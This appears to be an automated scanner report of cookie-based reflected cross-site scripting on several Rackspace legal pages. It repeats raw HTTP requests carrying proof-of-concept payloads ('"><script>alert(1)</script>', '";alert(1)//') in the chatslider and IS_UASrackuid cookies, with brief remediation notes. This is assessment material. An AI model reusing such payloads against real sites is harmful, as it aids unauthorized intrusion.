GET /information/legal/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D279c9"><script>alert(1)</script>3be2fd9b4de; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c06d6"%3balert(1)//ac5fd9481f3 was submitted in the chatslider cookie. This input was echoed as c06d6";alert(1)//ac5fd9481f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/legal/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dc06d6"%3balert(1)//ac5fd9481f3; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2c38"><script>alert(1)</script>c2bacbbad52 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/legal/mailterms.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8b2c38"><script>alert(1)</script>c2bacbbad52; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41dad"%3balert(1)//6893b9b887b was submitted in the IS_UASrackuid cookie. This input was echoed as 41dad";alert(1)//6893b9b887b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/legal/mailterms.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f841dad"%3balert(1)//6893b9b887b; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85b71"%3balert(1)//a4235a5de8c was submitted in the chatslider cookie. This input was echoed as 85b71";alert(1)//a4235a5de8c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/legal/mailterms.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D85b71"%3balert(1)//a4235a5de8c; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cb2e"><script>alert(1)</script>bcb687838d1 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/legal/mailterms.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D8cb2e"><script>alert(1)</script>bcb687838d1; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6f0c"><script>alert(1)</script>983a65c60f0 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/legal/privacystatement.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8c6f0c"><script>alert(1)</script>983a65c60f0; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9708"%3balert(1)//b05d37e631f was submitted in the IS_UASrackuid cookie. This input was echoed as d9708";alert(1)//b05d37e631f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/legal/privacystatement.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8d9708"%3balert(1)//b05d37e631f; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6106"><script>alert(1)</script>81be13425d was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/legal/privacystatement.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Df6106"><script>alert(1)</script>81be13425d; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a1a5"%3balert(1)//f43380476f5 was submitted in the chatslider cookie. This input was echoed as 2a1a5";alert(1)//f43380476f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/legal/privacystatement.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D2a1a5"%3balert(1)//f43380476f5; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c51ad"%3balert(1)//652c6fe05f6 was submitted in the IS_UASrackuid cookie. This input was echoed as c51ad";alert(1)//652c6fe05f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/legal/sharepointappterms.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8c51ad"%3balert(1)//652c6fe05f6; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36d03"><script>alert(1)</script>7d13eedcca4 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/legal/sharepointappterms.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f836d03"><script>alert(1)</script>7d13eedcca4; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e885e"><script>alert(1)</script>1f54eadbec0 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/legal/sharepointappterms.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=De885e"><script>alert(1)</script>1f54eadbec0; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37bb1"%3balert(1)//adfb6867553 was submitted in the chatslider cookie. This input was echoed as 37bb1";alert(1)//adfb6867553 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/legal/sharepointappterms.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
